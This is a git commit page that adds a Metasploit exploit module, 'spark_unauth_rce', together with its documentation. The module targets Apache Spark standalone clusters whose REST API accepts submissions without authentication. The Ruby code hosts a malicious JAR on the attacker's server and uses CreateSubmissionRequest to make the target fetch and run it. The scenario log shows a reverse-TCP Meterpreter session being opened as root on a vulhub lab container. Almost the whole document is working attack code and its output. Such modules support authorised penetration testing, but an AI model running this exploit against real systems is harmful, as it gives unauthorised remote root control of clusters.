Land #10954, apache spark unauth rce module
parent
94abef4aa1
commit
e88d2a1fcd
|
@ -0,0 +1,70 @@
|
|||
## Description
|
||||
|
||||
This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.
|
||||
It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
https://github.com/vulhub/vulhub/tree/master/spark/unacc
|
||||
|
||||
`docker-compose up -d`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. get session on target
|
||||
2. `use exploit/linux/http/spark_unauth_rce`
|
||||
3. `set payload <payload>`
|
||||
4. `set rhosts <rhosts>`
|
||||
5. `set rport <rport>`
|
||||
6. `set srvhost <srvhost>`
|
||||
7. `set srvport <srvport>`
|
||||
8. `set lport <lport>`
|
||||
9. `set lhost <lhost>`
|
||||
10. `exploit`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Spark 2.3.1
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/spark_unauth_rce
|
||||
msf5 exploit(linux/http/spark_unauth_rce) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf5 exploit(linux/http/spark_unauth_rce) > set rport 6066
|
||||
rport => 6066
|
||||
msf5 exploit(linux/http/spark_unauth_rce) > set srvhost 10.139.14.167
|
||||
srvhost => 10.139.14.167
|
||||
msf5 exploit(linux/http/spark_unauth_rce) > set srvport 9999
|
||||
srvport => 9999
|
||||
msf5 exploit(linux/http/spark_unauth_rce) > set payload java/meterpreter/reverse_tcp
|
||||
payload => java/meterpreter/reverse_tcp
|
||||
msf5 exploit(linux/http/spark_unauth_rce) > set lhost 10.139.14.167
|
||||
lhost => 10.139.14.167
|
||||
msf5 exploit(linux/http/spark_unauth_rce) > set lport 5555
|
||||
lport => 5555
|
||||
msf5 exploit(linux/http/spark_unauth_rce) > exploit
|
||||
[*] Exploit running as background job 3.
|
||||
[*] Exploit completed, but no session was created.
|
||||
|
||||
[*] Started reverse TCP handler on 10.139.14.167:5555
|
||||
msf5 exploit(linux/http/spark_unauth_rce) > [*] Starting up our web service ...
|
||||
[*] Using URL: http://10.139.14.167:9999/feTYHNiHufrGI
|
||||
[*] 127.0.0.1:6066 - Sending the payload to the server...
|
||||
[*] Sending stage (53867 bytes) to 10.139.14.167
|
||||
[*] Meterpreter session 2 opened (10.139.14.167:5555 -> 10.139.14.167:56021) at 2018-11-12 16:59:33 +0800
|
||||
msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Name Type Information Connection
|
||||
-- ---- ---- ----------- ----------
|
||||
2 meterpreter java/linux root @ 96b2135aee9c 10.139.14.167:5555 -> 10.139.14.167:56021 (127.0.0.1)
|
||||
|
||||
msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 2
|
||||
[*] Starting interaction with 2...
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
meterpreter >
|
||||
```
|
|
@ -0,0 +1,150 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Apache Spark Unauthenticated Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.
|
||||
It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'aRe00t', # Proof of concept
|
||||
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://www.jianshu.com/p/a080cb323832'],
|
||||
['URL', 'https://github.com/vulhub/vulhub/tree/master/spark/unacc']
|
||||
],
|
||||
'Platform' => 'java',
|
||||
'Arch' => [ARCH_JAVA],
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic', {}]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Dec 12 2017',
|
||||
'DefaultTarget' => 0,
|
||||
'Notes' =>
|
||||
{
|
||||
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],
|
||||
'Stability' => [ CRASH_SAFE ],
|
||||
'Reliability' => [ REPEATABLE_SESSION]
|
||||
}
|
||||
))
|
||||
|
||||
register_options [
|
||||
Opt::RPORT(6066),
|
||||
OptInt.new('HTTPDELAY', [true, 'Number of seconds the web server will wait before termination', 10])
|
||||
]
|
||||
|
||||
end
|
||||
|
||||
def check
|
||||
return CheckCode::Detected if get_version
|
||||
CheckCode::Unknown
|
||||
end
|
||||
|
||||
def primer
|
||||
path = service.resources.keys[0]
|
||||
binding_ip = srvhost_addr
|
||||
|
||||
proto = datastore['SSL'] ? 'https' : 'http'
|
||||
payload_uri = "#{proto}://#{binding_ip}:#{datastore['SRVPORT']}/#{path}"
|
||||
|
||||
send_payload(payload_uri)
|
||||
end
|
||||
|
||||
def exploit
|
||||
fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version
|
||||
|
||||
vprint_status("Generating payload ...")
|
||||
@pl = generate_payload.encoded_jar(random:true)
|
||||
print_error("Failed to generate the payload.") unless @pl
|
||||
|
||||
print_status("Starting up our web service ...")
|
||||
Timeout.timeout(datastore['HTTPDELAY']) { super }
|
||||
rescue Timeout::Error
|
||||
end
|
||||
|
||||
def get_version
|
||||
@version = nil
|
||||
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path),
|
||||
'method' => 'GET'
|
||||
)
|
||||
|
||||
unless res
|
||||
vprint_bad("#{peer} - No response. ")
|
||||
return false
|
||||
end
|
||||
|
||||
if res.code == 401
|
||||
print_bad("#{peer} - Authentication required.")
|
||||
return false
|
||||
end
|
||||
|
||||
unless res.code == 400
|
||||
return false
|
||||
end
|
||||
|
||||
res_json = res.get_json_document
|
||||
@version = res_json['serverSparkVersion']
|
||||
|
||||
if @version.nil?
|
||||
vprint_bad("#{peer} - Cannot parse the response, seems like it's not Spark REST API.")
|
||||
return false
|
||||
end
|
||||
|
||||
true
|
||||
end
|
||||
|
||||
def send_payload(payload_uri)
|
||||
rand_appname = Rex::Text.rand_text_alpha_lower(8..16)
|
||||
|
||||
data =
|
||||
{
|
||||
"action" => "CreateSubmissionRequest",
|
||||
"clientSparkVersion" => @version.to_s,
|
||||
"appArgs" => [],
|
||||
"appResource" => payload_uri.to_s,
|
||||
"environmentVariables" => {"SPARK_ENV_LOADED" => "1"},
|
||||
"mainClass" => "#{@pl.substitutions["metasploit"]}.Payload",
|
||||
"sparkProperties" =>
|
||||
{
|
||||
"spark.jars" => payload_uri.to_s,
|
||||
"spark.driver.supervise" => "false",
|
||||
"spark.app.name" => rand_appname.to_s,
|
||||
"spark.eventLog.enabled" => "true",
|
||||
"spark.submit.deployMode" => "cluster",
|
||||
"spark.master" => "spark://#{rhost}:#{rport}"
|
||||
}
|
||||
}
|
||||
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "/v1/submissions/create"),
|
||||
'method' => 'POST',
|
||||
'ctype' => 'application/json;charset=UTF-8',
|
||||
'data' => data.to_json
|
||||
)
|
||||
|
||||
end
|
||||
|
||||
# Handle incoming requests
|
||||
def on_request_uri(cli, request)
|
||||
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
|
||||
send_response(cli, @pl)
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue